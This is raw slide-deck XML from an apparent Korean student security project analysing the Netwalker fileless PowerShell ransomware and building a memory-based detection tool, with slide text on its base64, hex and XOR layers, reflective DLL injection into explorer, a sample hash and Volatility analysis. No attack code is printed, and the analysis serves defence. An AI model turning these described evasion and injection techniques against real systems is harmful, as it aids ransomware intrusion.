              <a:t>메모리를 스캔하여 악성스크립트 코드를 탐지</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>메모리가 아닌 메모리 버퍼라고 한 이유 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>msdn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에서 굳이 메모리 버퍼라고 언급함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A0505-0B28-492D-BC39-59B3CFFD7BA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66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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>Netwalker.PS 1ps1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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>여러 계층의 암호화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KoPubWorld돋움체 Medium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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>난독화 및 인코딩으로 만들어진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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>Script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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>이다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KoPubWorld돋움체 Medium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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>분석한 샘플은 총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KoPubWorld돋움체 Medium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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>개의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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>Code Layer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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>가 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KoPubWorld돋움체 Medium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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>최상위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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>Layer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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>base 64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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>인코딩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KoPubWorld돋움체 Medium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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>두 번째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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>Layer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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>16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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>진수 인코딩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KoPubWorld돋움체 Medium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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>xor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KoPubWorld돋움체 Medium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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>연산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KoPubWorld돋움체 Medium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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>마지막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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>Layer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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>는 난독화가 되어있는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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>Main script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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>가 존재한다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KoPubWorld돋움체 Medium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A0505-0B28-492D-BC39-59B3CFFD7BA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196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ea typeface="KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>배열의 형태로 존재하는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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>binary script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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>와 사용되는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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>API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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>및 메모리 주소 계산 함수 등의 존재하는 것을 보아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KoPubWorld돋움체 Medium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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>Fileless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KoPubWorld돋움체 Medium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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>기법 중 흔하게 쓰이는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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>Reflective DLL Injection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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>을 이용했다는 것을 알 수 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KoPubWorld돋움체 Medium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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>해당 공격 기법은 현재 실행 중인 프로세스에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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>DLL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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>Injection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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>하는 공격이므로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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>, Injection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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>을 할 프로세스를 검색이 필요하다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KoPubWorld돋움체 Medium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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>해당 코드는 정상 프로세스인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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>explore’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KoPubWorld돋움체 Medium"/>
              </a:rPr>
              <a:t>를 검색하는 코드이다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KoPubWorld돋움체 Medium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A0505-0B28-492D-BC39-59B3CFFD7BA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705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F2518B4-EDC0-4E7D-AEF3-6039A59E382F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16213913" y="-1028700"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F03C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4DE148E-F3E2-41E0-B666-E1CB4516409F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17373600" y="-1028700"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A3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85FD6A-DB58-4B25-A3FE-2501BFE1C8E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15054226" y="-1028700"/>
            <a:ext cx="914400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65AEB1-52B9-4F29-A1D1-17D1B70D4D4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13894539" y="-1028700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E7895880-9475-4965-B867-F29B48B431B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5715000" y="9326562"/>
            <a:ext cx="12954000" cy="13716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D4013720-22DD-4DB3-B0A5-94FD8FEBC5BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6019800" y="9639300"/>
            <a:ext cx="12649200" cy="906462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2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숨은그림찾기 추억편(월리를 찾아라!) - YouTube">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{595D4739-077D-422D-86DB-EEEA76081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080" y="-24872"/>
            <a:ext cx="18329931" cy="1031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3DD054-A0CA-4DDE-B718-A94CFDBE8AD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-26080" y="-23586"/>
            <a:ext cx="18332221" cy="10310586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838200" y="1391808"/>
            <a:ext cx="16114064" cy="41326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>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" kern="0" spc="-300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="6000" kern="0" spc="-300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 악성코드 분석 및 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="6000" kern="0" spc="-300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun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000" kern="0" spc="-300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>이벤트와 메모리 분석을 통한  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="6000" kern="0" spc="-300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun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000" kern="0" spc="-300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>사후 탐지 툴 개발</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="6000" kern="0" spc="-300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun" panose="020B0600000101010101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24139" y="6353601"/>
            <a:ext cx="8142186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kern="0" spc="-100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F03C5A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월리를 찾아서</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F03C5A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66159" y="7477493"/>
            <a:ext cx="10258145" cy="116002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K-Shield jr. 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="20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 프로젝트</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="20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김지원 김다영 이서영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최건규</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="20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김보경 김지연</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="20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김지혜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김태옥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="20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박선영 이지영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진익상</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="20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endParaRPr lang="en-US" sz="20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A5D7BE1-AA74-49F1-9BA7-149A3D1B0D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2883517" y="5829300"/>
            <a:ext cx="12023430" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="F03C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576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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>악성코드 분석 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" kern="0" spc="-200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Netwalker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun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3626C1-C137-4FDE-B86A-B0E60CEC91D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="2399983"/>
            <a:ext cx="15126213" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="D9D9D9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악성코드 이름 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: Netwalker.ps1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>악성코드 특징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dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r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스크립트를 이용하여 파일들을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>암호화시키는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 파일리스 유형의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>랜섬웨어</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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악성코드 샘플 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: https://app.any.run/tasks/a73c2f59-5c58-4e93-b467-ef627707293a/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>악성코드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>해시값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: b1f0093b89561c6123070165bd2261e2 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>분석 환경 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: Windows 7 Service Pack 1_64 Bit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7171" name="_x64942984">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83F6818A-D0BC-45E4-99BA-F1D156E4E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795986"/>
            <a:ext cx="15126213" cy="468617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900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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>악성코드 분석 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" kern="0" spc="-200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Netwalker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="순서도: 수행의 시작/종료 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23321DAC-299A-40B6-8756-E67EEE1899CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763492" y="2340837"/>
            <a:ext cx="2851484" cy="650658"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6A6A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에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Script</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="18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+mn-ea"/>
              <a:cs typeface="Calibri"/>
              <a:sym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80AB5D-8D30-462E-91F4-1C3FE6F41E94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3919030" y="2499408"/>
            <a:ext cx="9336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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>복호화</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>난독화 해제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2D13F44-606C-4F42-AD18-286A2F284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162300"/>
            <a:ext cx="8699746" cy="694394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D53F2A3-EDE5-4F95-ABEE-9F8F8EFA0A71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9829800" y="4444462"/>
            <a:ext cx="7543800" cy="699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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>근거</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: binary script, API, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>메모리 주소 계산 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="28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88A983-EF26-4856-913E-26010660CCB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11277600" y="3083682"/>
            <a:ext cx="4648200" cy="699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u="sng" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Reflective DLL Injection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F7CD7F-0C64-4D4E-AB69-0D605BA99B8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10363200" y="5767947"/>
            <a:ext cx="6477000" cy="1388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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>결과</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" kern="0" dirty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2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>실행 중인 정상프로세스 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>explore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>를 검색하여 메모리에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DLL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>코드 삽입</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="28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57482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11845B9-E9FD-4494-A165-FB796F625211}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947976" y="8267700"/>
            <a:ext cx="12827002" cy="13060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704227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>악성코드 분석 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" kern="0" spc="-200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Netwalker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRPr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:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE23CCA7-9C3E-4FB2-AD9A-D25F61DB6E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763492" y="7317700"/>
            <a:ext cx="2851484" cy="650658"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6A6A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에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Memory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="18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+mn-ea"/>
              <a:cs typeface="Calibri"/>
              <a:sym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89E2CD-0A6F-4450-89EF-9F6C4F6682AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3919030" y="7476271"/>
            <a:ext cx="9336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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>volatility &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>dlllist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
